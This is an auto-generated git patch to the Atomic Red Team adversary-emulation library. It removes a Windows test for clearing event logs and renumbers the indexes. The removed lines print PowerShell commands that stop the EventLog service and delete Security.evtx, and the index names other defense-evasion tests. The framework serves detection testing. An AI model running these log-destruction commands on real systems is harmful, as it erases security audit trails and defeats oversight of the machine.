From e8340a678f68da9940323e190e3ed02f215b6f9e Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 20 Jul 2020 12:37:27 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/Indexes/Indexes-CSV/index.csv         |  3 +-
 atomics/Indexes/Indexes-CSV/windows-index.csv |  3 +-
 atomics/Indexes/Indexes-Markdown/index.md     |  3 +-
 .../Indexes/Indexes-Markdown/windows-index.md |  3 +-
 atomics/Indexes/index.yaml                    | 18 ---------
 atomics/T1551.001/T1551.001.md                | 38 +------------------
 6 files changed, 6 insertions(+), 62 deletions(-)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index a88e8aaf..8abb0408 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -222,8 +222,7 @@ defense-evasion,T1551.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-
 defense-evasion,T1551.002,Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
 defense-evasion,T1551.002,Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
 defense-evasion,T1551.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
-defense-evasion,T1551.001,Clear Windows Event Logs,2,Delete System Logs Using PowerShell,334c36ca-fec3-47ff-afdb-22b2ae6d0812,powershell
-defense-evasion,T1551.001,Clear Windows Event Logs,3,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
+defense-evasion,T1551.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
 defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
 defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
 defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index fcbcb654..30d68919 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -65,8 +65,7 @@ defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt De
 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
 defense-evasion,T1551.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
-defense-evasion,T1551.001,Clear Windows Event Logs,2,Delete System Logs Using PowerShell,334c36ca-fec3-47ff-afdb-22b2ae6d0812,powershell
-defense-evasion,T1551.001,Clear Windows Event Logs,3,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
+defense-evasion,T1551.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
 defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
 defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
 defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index c06d75ed..a308dc96 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -467,8 +467,7 @@
   - Atomic Test #3: Overwrite Linux Log [linux]
 - [T1551.001 Clear Windows Event Logs](../../T1551.001/T1551.001.md)
   - Atomic Test #1: Clear Logs [windows]
-  - Atomic Test #2: Delete System Logs Using PowerShell [windows]
-  - Atomic Test #3: Delete System Logs Using Clear-EventLogId [windows]
+  - Atomic Test #2: Delete System Logs Using Clear-EventLogId [windows]
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index b6c5aacd..1e986429 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -139,8 +139,7 @@
   - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
 - [T1551.001 Clear Windows Event Logs](../../T1551.001/T1551.001.md)
   - Atomic Test #1: Clear Logs [windows]
-  - Atomic Test #2: Delete System Logs Using PowerShell [windows]
-  - Atomic Test #3: Delete System Logs Using Clear-EventLogId [windows]
+  - Atomic Test #2: Delete System Logs Using Clear-EventLogId [windows]
 - T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md)
   - Atomic Test #1: Compile After Delivery using csc.exe [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 08bcb96f..1233a227 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -21240,24 +21240,6 @@ defense-evasion:
 '
         name: command_prompt
         elevation_required: true
-    - name: Delete System Logs Using PowerShell
-      auto_generated_guid: 334c36ca-fec3-47ff-afdb-22b2ae6d0812
-      description: |
-        Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments.
-        Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
-        When this service gets stopped, it is automatically restarted and the Security.evtx file re-created.
-      supported_platforms:
-      - windows
-      executor:
-        command: |
-          $eventLogId = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'EventLog'" | Select-Object -ExpandProperty ProcessId
-          Stop-Process -Id $eventLogId -Force
-          Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx
-        cleanup_command: 'Start-Service -Name EventLog
-
-'
-        name: powershell
-        elevation_required: true
     - name: Delete System Logs Using Clear-EventLogId
       auto_generated_guid: b13e9306-3351-4b4b-a6e8-477358b0b498
       description: |
diff --git a/atomics/T1551.001/T1551.001.md b/atomics/T1551.001/T1551.001.md
index a5b7dfb5..ea84e8b2 100644
--- a/atomics/T1551.001/T1551.001.md
+++ b/atomics/T1551.001/T1551.001.md
@@ -14,9 +14,7 @@ These logs may also be cleared through other mechanisms, such as the event viewe
 
 - [Atomic Test #1 - Clear Logs](#atomic-test-1---clear-logs)
 
-- [Atomic Test #2 - Delete System Logs Using PowerShell](#atomic-test-2---delete-system-logs-using-powershell)
-
-- [Atomic Test #3 - Delete System Logs Using Clear-EventLogId](#atomic-test-3---delete-system-logs-using-clear-eventlogid)
+- [Atomic Test #2 - Delete System Logs Using Clear-EventLogId](#atomic-test-2---delete-system-logs-using-clear-eventlogid)
 
 
 <br/>
@@ -50,39 +48,7 @@ wevtutil cl #{log_name}
 <br/>
 <br/>
 
-## Atomic Test #2 - Delete System Logs Using PowerShell
-Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments.
-Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
-When this service gets stopped, it is automatically restarted and the Security.evtx file re-created.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-$eventLogId = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'EventLog'" | Select-Object -ExpandProperty ProcessId
-Stop-Process -Id $eventLogId -Force
-Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx
-```
-
-#### Cleanup Commands:
-```powershell
-Start-Service -Name EventLog
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Delete System Logs Using Clear-EventLogId
+## Atomic Test #2 - Delete System Logs Using Clear-EventLogId
 Clear event logs using built-in PowerShell commands.
 Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.